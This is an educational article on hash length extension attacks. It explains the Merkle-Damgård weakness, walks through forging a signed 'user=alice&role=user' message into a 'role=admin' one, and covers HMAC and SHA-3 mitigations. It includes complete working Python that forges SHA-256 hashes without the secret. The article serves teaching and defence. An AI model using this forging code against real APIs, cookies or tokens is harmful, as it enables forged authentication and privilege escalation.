Cybersecurity: Length Extension Attack
A length extension attack exploits a structural weakness in certain cryptographic hash functions. Given the hash of a secret-prefixed message, H(secret || message), and the length of secret || message, an attacker can append data and compute a valid hash for the extended message without knowing the secret key. This vulnerability affects popular algorithms such as MD5, SHA-1, and SHA-256 because of their Merkle-Damgård construction. The attack compromises message integrity and authentication, making modified messages appear authentic.
Key Points
- Vulnerable algorithms: MD5, SHA-1, SHA-256, and SHA-512 are susceptible due to their Merkle-Damgård construction
- Attack requirements: Original hash value, message length (or estimate), and knowledge of padding rules
- Attack mechanism: Uses the final hash as an internal state to continue hashing with appended data
- Security impact: Compromises integrity and authentication, not confidentiality
- Primary defense: Use HMAC (Hash-based Message Authentication Code) or SHA-3
How the Vulnerability Works
The Merkle-Damgård construction processes data in sequential blocks, maintaining an internal state that passes from one block to the next. The final hash output is simply the internal state after processing the last block.
This design creates an exploitable weakness:
- The final hash reveals the internal state of the hash function
- This state can be used as a starting point to continue hashing
- An attacker can append new data and produce a valid hash
- No knowledge of the secret key or of the original message's content is required, only its length
Critical Insight: The hash function cannot distinguish between a genuine message and one that has been extended using this technique.
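To make the chaining concrete, here is a deliberately simplified toy construction (hypothetical, not MD5 or SHA-256): its compression function is built from SHA-256 and padding is omitted, so inputs must be block-aligned. The names `compress`, `toy_md`, and the sample secret are illustrative only. It shows that the published output of one message is a valid starting state for hashing more data.

```python
import hashlib

BLOCK = 16       # toy block size in bytes (real SHA-256 uses 64)
IV = bytes(32)   # toy initial chaining value: 32 zero bytes

def compress(state: bytes, block: bytes) -> bytes:
    """Toy compression function: mixes one block into the 32-byte state.
    Built from SHA-256 purely for illustration."""
    return hashlib.sha256(state + block).digest()

def toy_md(data: bytes, state: bytes = IV) -> bytes:
    """Chain compress() over the blocks of data. The return value is simply
    the final chaining state. Padding is omitted, so len(data) must be a
    multiple of BLOCK."""
    if len(data) % BLOCK:
        raise ValueError("toy version accepts block-aligned input only")
    for i in range(0, len(data), BLOCK):
        state = compress(state, data[i:i + BLOCK])
    return state

secret = b"0123456789abcdef"                      # 16 bytes, unknown to the attacker
msg = b"user=alice&role="                         # 16 bytes
extension = b"&role=admin".ljust(BLOCK, b"\x00")  # padded to one toy block

digest = toy_md(secret + msg)             # the published output
forged = toy_md(extension, state=digest)  # resume from the output; no secret used
print(forged == toy_md(secret + msg + extension))  # True
```

Real Merkle-Damgård hashes add length padding, which the attacker must also reproduce, but the core weakness is the same: output and internal state are one and the same value.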
Attack Prerequisites
Hash of the Original Message
The attacker must obtain the hash value, which represents the final internal state after processing the original message. This is often publicly available or transmitted over networks.
Message Length
The attacker needs to know or estimate the length of the original message. This can be:
- Determined from application behavior or API responses
- Guessed based on common patterns (e.g., standard token formats)
- Brute-forced if the range is limited
Padding Rules
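Hash functions apply standardized padding to messages. For MD5, SHA-1, SHA-256, and SHA-512, the padding is a single 1 bit (the byte 0x80), then zero bits, then the original message length in bits, so it depends only on the message length. These rules are publicly documented and predictable, making the padding easy to reconstruct.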
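As a sketch of how little an attacker needs, the SHA-256 padding can be computed from the message length alone. The function name `sha256_padding` is illustrative; the layout follows the SHA-256 specification (FIPS 180-4).

```python
import struct

def sha256_padding(message_len: int) -> bytes:
    """Return the padding SHA-256 appends to a message of message_len bytes.

    Layout: one 0x80 byte (a 1 bit followed by zero bits), enough zero bytes
    to reach 56 mod 64, then the message length in bits as a 64-bit
    big-endian integer. Message plus padding always fills whole 64-byte blocks.
    """
    zeros = (55 - message_len) % 64
    return b"\x80" + b"\x00" * zeros + struct.pack(">Q", message_len * 8)

print(len(sha256_padding(3)))   # 61: 0x80, 52 zero bytes, 8-byte length (24 bits)
```

MD5 uses the same layout but stores the length little-endian; SHA-512 uses 128-byte blocks and a 128-bit length field.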
Step-by-Step Attack Process
- Obtain the original hash - Capture the hash representing the internal state
- Reconstruct the padding - Apply the same padding rules the hash function used
- Initialize with the hash - Use the obtained hash as the starting internal state
- Append malicious data - Add the attacker's chosen content after the padding
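- Continue hashing - Process the new data blocks using the hash function's algorithm, counting the original message and its padding as already processed so that the final padding encodes the length of the whole extended message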
- Generate valid hash - Produce a legitimate hash for the extended message
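The steps above can be sketched end to end for SHA-256. This is a minimal, slow, pure-Python illustration, assuming the attacker knows len(secret || message); the SHA-256 compression function is written from the FIPS 180-4 description, and the names `extend`, `compress`, and the key `hypothetical-key` are all hypothetical. The round constants are derived exactly from the primes rather than typed in. Only the legitimate hash uses `hashlib`; the forgery never touches the secret.

```python
import hashlib
import struct

MASK = 0xFFFFFFFF

def first_primes(n):
    primes, candidate = [], 2
    while len(primes) < n:
        if all(candidate % p for p in primes if p * p <= candidate):
            primes.append(candidate)
        candidate += 1
    return primes

def icbrt(n):
    """Exact floor of the cube root of n (integer Newton's method)."""
    x = 1 << ((n.bit_length() + 2) // 3)  # starting guess >= cbrt(n)
    while True:
        y = (2 * x + n // (x * x)) // 3
        if y >= x:
            return x
        x = y

# SHA-256 round constants: first 32 fractional bits of cube roots of the first 64 primes.
K = [icbrt(p << 96) & MASK for p in first_primes(64)]

def rotr(x, n):
    return ((x >> n) | (x << (32 - n))) & MASK

def compress(state, block):
    """One SHA-256 compression step: absorb a 64-byte block into 8 state words."""
    w = list(struct.unpack(">16I", block))
    for t in range(16, 64):
        s0 = rotr(w[t - 15], 7) ^ rotr(w[t - 15], 18) ^ (w[t - 15] >> 3)
        s1 = rotr(w[t - 2], 17) ^ rotr(w[t - 2], 19) ^ (w[t - 2] >> 10)
        w.append((w[t - 16] + s0 + w[t - 7] + s1) & MASK)
    a, b, c, d, e, f, g, h = state
    for t in range(64):
        t1 = (h + (rotr(e, 6) ^ rotr(e, 11) ^ rotr(e, 25))
              + ((e & f) ^ (~e & g)) + K[t] + w[t]) & MASK
        t2 = ((rotr(a, 2) ^ rotr(a, 13) ^ rotr(a, 22))
              + ((a & b) ^ (a & c) ^ (b & c))) & MASK
        h, g, f, e, d, c, b, a = g, f, e, (d + t1) & MASK, c, b, a, (t1 + t2) & MASK
    return [(x + y) & MASK for x, y in zip(state, (a, b, c, d, e, f, g, h))]

def sha256_padding(message_len):
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)

def extend(orig_digest_hex, orig_len, extension):
    """Return (glue padding, forged hex digest) for secret||msg||glue||extension."""
    state = list(struct.unpack(">8I", bytes.fromhex(orig_digest_hex)))  # step 3
    glue = sha256_padding(orig_len)                                     # step 2
    processed = orig_len + len(glue)            # bytes already absorbed (multiple of 64)
    tail = extension + sha256_padding(processed + len(extension))      # steps 4-5
    for i in range(0, len(tail), 64):
        state = compress(state, tail[i:i + 64])
    return glue, struct.pack(">8I", *state).hex()                       # step 6

secret = b"hypothetical-key"            # 16 bytes; never used by extend()
message = b"user=alice&role=user"
orig = hashlib.sha256(secret + message).hexdigest()   # step 1: what the attacker sees

glue, forged = extend(orig, len(secret) + len(message), b"&role=admin")
forged_message = message + glue + b"&role=admin"
print(hashlib.sha256(secret + forged_message).hexdigest() == forged)  # True
```

If the secret's length is unknown, the attacker can call `extend` once per candidate length and submit each resulting pair, which is the brute-force option described under Attack Prerequisites.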
Practical Example
Legitimate Scenario
Message: secret_key + "user=alice&role=user"
Hash: abc123def456...
The application calculates a hash to verify message integrity and authenticity.
Attack Scenario
Original: secret_key + "user=alice&role=user"
Original Hash: abc123def456...
Attacker reconstructs:
secret_key + "user=alice&role=user" + [padding]
Attacker appends: "&role=admin"
Extended message:
secret_key + "user=alice&role=user" + [padding] + "&role=admin"
New valid hash: xyz789ghi012...
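Result: The system accepts the modified message as authentic because the hash validates correctly, even though the attacker never knew the secret_key. The extended message carries the raw padding bytes between the original data and the appended parameter, so the privilege escalation depends on how the application parses it: if it resolves the duplicated role parameter by taking the last value, the attacker has escalated privileges from user to admin.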
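A minimal sketch of that parsing step, assuming the server reads the message with Python's `urllib.parse.parse_qs` and that the application (hypothetically) trusts the last value of a repeated parameter. `SECRET_LEN = 16` is an assumed, guessed key length; the attacker needs only this number, not the key itself.

```python
import struct
from urllib.parse import parse_qs

def sha256_padding(message_len: int) -> bytes:
    """SHA-256 padding: 0x80, zero bytes, then the 64-bit big-endian bit length."""
    return b"\x80" + b"\x00" * ((55 - message_len) % 64) + struct.pack(">Q", message_len * 8)

SECRET_LEN = 16                      # assumption: known or guessed len(secret_key)
original = b"user=alice&role=user"

# The message the attacker sends along with the forged hash.
forged = original + sha256_padding(SECRET_LEN + len(original)) + b"&role=admin"

# Decode byte-for-byte (latin-1) so the raw padding bytes survive as characters.
params = parse_qs(forged.decode("latin-1"))
print(params["user"])       # prints: ['alice']
print(params["role"][-1])   # prints: admin  (what a last-value-wins app would use)
```

The padding bytes end up glued onto the first `role` value, which is why applications that reject duplicate or malformed parameters are harder to exploit even when the hash itself is forgeable.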
Why This Attack Succeeds
The vulnerability exists because of four key factors:
- Exposed internal state: The hash output directly reveals the internal state
- Stateless continuation: Nothing prevents using this state to process additional blocks
- Predictable padding: Standard padding rules are publicly known and easily reconstructed
- No finalization: The hash function doesn't cryptographically "seal" the final state
The hash function treats these two scenarios identically:
- A message that naturally ends at a certain point
- A message that has been artificially extended after that point
Vulnerable Hash Functions
| Hash Function | Length Extension | Notes |
|---|---|---|
| MD5 | Vulnerable | Also broken for collision resistance; deprecated |
| SHA-1 | Vulnerable | Collision resistance also broken; phased out in modern systems |
| SHA-256 | Vulnerable | Cryptographically strong but still susceptible |
| SHA-512 | Vulnerable | Same Merkle-Damgård weakness as SHA-256 |
| SHA-3 | Not vulnerable | Uses Keccak sponge construction |
Important: Even cryptographically strong functions like SHA-256 remain vulnerable to length extension attacks when used for message authentication as H(K || M) instead of a proper construction like HMAC.
Mitigation Strategies
Use HMAC (Recommended)
HMAC completely prevents length extension attacks through its double-hashing construction:
HMAC(K, M) = H((K ⊕ opad) || H((K ⊕ ipad) || M))
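The formula can be written out directly and checked against Python's standard `hmac` module. This sketch assumes SHA-256 (64-byte block) and follows RFC 2104: long keys are hashed first, the key is zero-padded to one block, ipad is the byte 0x36 repeated and opad is 0x5C repeated. The function name is illustrative.

```python
import hashlib
import hmac

def hmac_sha256_manual(key: bytes, message: bytes) -> bytes:
    """HMAC-SHA256 written out as H((K xor opad) || H((K xor ipad) || M))."""
    block_size = 64                          # SHA-256 block size in bytes
    if len(key) > block_size:
        key = hashlib.sha256(key).digest()   # keys longer than a block are hashed first
    key = key.ljust(block_size, b"\x00")     # then zero-padded to one block
    inner_key = bytes(b ^ 0x36 for b in key) # K xor ipad
    outer_key = bytes(b ^ 0x5C for b in key) # K xor opad
    inner = hashlib.sha256(inner_key + message).digest()
    return hashlib.sha256(outer_key + inner).digest()   # published tag = outer hash

key, msg = b"hypothetical-key", b"user=alice&role=user"
print(hmac_sha256_manual(key, msg) == hmac.new(key, msg, hashlib.sha256).digest())  # True
```

The published tag is the outer hash. Extending it would only yield the hash of outer_key || inner || padding || extra data, which is not the HMAC of any message the verifier will compute.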
Why HMAC works:
- The internal state after processing the message is not the final output
- The secret key enters both the inner hash (before the message) and the outer hash, which wraps the inner result
- The nested structure prevents attackers from using the output to continue hashing
- Standardized and widely supported across programming languages
Alternative Approaches
Use SHA-3: Based on the Keccak sponge construction, SHA-3 is inherently immune to length extension attacks due to its fundamentally different design.
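A minimal sketch of a prefix-keyed SHA-3 tag using `hashlib.sha3_256`, assuming a fixed-length key (so the key/message boundary is unambiguous). The function names are hypothetical. NIST standardizes a dedicated keyed SHA-3 mode, KMAC (SP 800-185), which Python's `hashlib` does not provide.

```python
import hashlib
import hmac

def sha3_tag(key: bytes, message: bytes) -> bytes:
    """Prefix-keyed SHA3-256 tag, H(K || M). The 32-byte output reveals only part
    of the 1600-bit Keccak state, so it cannot be used to resume hashing."""
    return hashlib.sha3_256(key + message).digest()

def sha3_verify(key: bytes, message: bytes, tag: bytes) -> bool:
    # constant-time comparison of the expected and received tags
    return hmac.compare_digest(sha3_tag(key, message), tag)

key = b"k" * 32                      # assumption: fixed 32-byte key
tag = sha3_tag(key, b"user=alice&role=user")
print(sha3_verify(key, b"user=alice&role=user", tag))   # True
```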
Use authenticated encryption: Employ schemes like AES-GCM or ChaCha20-Poly1305 that provide both encryption and authentication.
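Append key at the end: Use H(M || K) instead of H(K || M). This blocks the basic extension attack, but its security then rests on the collision resistance of H: a collision between two equal-length messages yields a forged tag, which is practical for MD5 and SHA-1. It is less secure than HMAC and not recommended for production systems.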
Real-World Analogy
Imagine a document with a wax seal:
Secure system: The seal covers the entire document edge, making additions obvious.
Length extension attack:
- You see only the final seal impression (the hash)
- You can add pages to the document
- You can produce a new, valid seal for the extended document
- The recipient believes all pages are original
The recipient has no way to distinguish between the original sealed document and your extended version because the seal itself provides the information needed to continue sealing.
Security Implications
This attack compromises:
- Message integrity: Modified messages appear unaltered and valid
- Authentication: Forged messages seem to come from legitimate sources
- Authorization: Attackers can escalate privileges or modify permissions
- API security: Signed API requests can be manipulated to perform unauthorized actions
Note: This is not a confidentiality attack. The attacker learns nothing about the secret key or about any unknown parts of the original message. The vulnerability affects integrity and authentication only.
Common Vulnerable Scenarios
API authentication: Systems using hash(secret + request_data) for API signatures
Cookie signing: Web applications using hash(secret + cookie_value) to prevent tampering
Token generation: Authentication tokens created with hash(secret + user_data)
File integrity: Systems verifying file integrity with hash(key + file_content)
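Taking the cookie-signing case as an example, the vulnerable pattern and an HMAC-based replacement differ by one line. This is a sketch with a hypothetical placeholder secret `SECRET`; the functions use only the standard `hashlib` and `hmac` modules.

```python
import hashlib
import hmac

SECRET = b"hypothetical-server-secret"   # placeholder; load from secure config in practice

def sign_vulnerable(value: bytes) -> str:
    # hash(secret + cookie_value): extendable with SHA-256
    return hashlib.sha256(SECRET + value).hexdigest()

def sign(value: bytes) -> str:
    # HMAC-SHA256 over the same value: not extendable
    return hmac.new(SECRET, value, hashlib.sha256).hexdigest()

def verify(value: bytes, signature: str) -> bool:
    # compare_digest reduces timing leaks from early-exit string comparison
    return hmac.compare_digest(sign(value), signature)

cookie = b"user=alice&role=user"
sig = sign(cookie)
print(verify(cookie, sig))                     # True
print(verify(cookie + b"&role=admin", sig))    # False
```

The same substitution applies to the API, token, and file-integrity cases: replace the concatenate-then-hash call with `hmac.new(key, data, hashlib.sha256)` and compare tags with `hmac.compare_digest`.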
Summary
Length extension attacks exploit the Merkle-Damgård construction by using the hash output as an internal state to continue processing additional data. While MD5, SHA-1, SHA-256, and SHA-512 are vulnerable when used directly for message authentication, proper use of HMAC completely neutralizes this threat. Modern applications should always use HMAC, SHA-3, or authenticated encryption schemes rather than raw hash functions for message authentication purposes.